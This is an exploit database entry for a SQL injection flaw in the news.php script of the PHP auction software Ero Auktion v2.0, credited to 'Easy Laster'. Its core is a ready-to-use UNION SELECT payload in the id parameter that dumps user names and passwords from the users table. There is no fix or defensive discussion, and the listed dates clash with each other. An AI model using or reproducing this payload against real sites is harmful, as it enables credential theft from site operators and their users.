Ero Auktion v2.0 (news.php) SQL Injection Vulnerability

2010-02-22T00:00:00
ID 1337DAY-ID-11018
Type zdt
Reporter Easy Laster
Modified 2010-02-22T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =======================================================
Ero Auktion v2.0 (news.php) SQL Injection Vulnerability
=======================================================

----------------------------Information----------------------------------------
+Autor : Easy Laster
+Date   : 21.10.2010
+Script  : Ero Auktion V.2.0 SQL Injection news.php
+Download : -----
+Price : 34,90?
+Language :PHP
+Discovered by Easy Laster

--------------------------------------------------------------------------------
+Vulnerability : www.Site.com/news.php?id=[SQL]
+Exploitable   : www.site.com/flashauktion/news.php?id=11111111+union+select+1,
2,concat%28name,0x3a,password%29,4,5+from+users
--------------------------------------------------------------------------------



#  0day.today [2018-03-12]  #